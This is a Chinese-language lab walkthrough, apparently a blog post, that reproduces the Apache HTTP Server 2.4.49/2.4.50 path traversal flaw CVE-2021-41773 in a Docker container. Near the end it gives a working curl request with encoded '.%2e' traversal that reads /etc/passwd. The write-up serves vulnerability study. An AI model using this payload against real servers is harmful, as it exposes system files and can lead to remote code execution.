漏洞原理及影响版本
此次漏洞影响的版本有2.4.49 & 2.4.50版本的ahache
CVE-2021-41773 是在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“要求全部拒绝”的保护,则这些请求可能会成功,如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。
此外,此缺陷可能会泄漏 CGI 脚本等解释文件的来源,已知此问题已被广泛利用。
此问题仅影响 Apache 2.4.49 和 Apache 2.4.50而不是早期版本。
参考链接:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
1.环境搭建
此次的漏洞复现是在docker上进行
1.1docker的安装
docker的安装可从官网上看https://docs.docker.com/engine/install/centos/
或者看我博文:https://editor.csdn.net/md/?articleId=116257398
1.2从平台上拉取apache 2.4.49版本
拉取apache镜像
docker pull httpd:2.4.49
查看镜像版本是否正确
docker images
启动镜像
docker run -d -P e91425f38618
docker ps
进入容器
docker exec -it 4af5d1983b99 /bin/bash
修改镜像里面conf/httpd.conf的配置文件
如果出现以下这种情况,则输入以下两行代码即可安装vim
apt-get update
apt-get -y install vim
编辑conf/httpd.conf下的这两行,注释掉重新加进去
2.漏洞复现
查看映射端口
浏览器访问
用另一台机器访问
curl http://192.168.160.129:49154
curl http://192.168.160.129:49154/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
也可以用抓包改包软件来重构exp获取
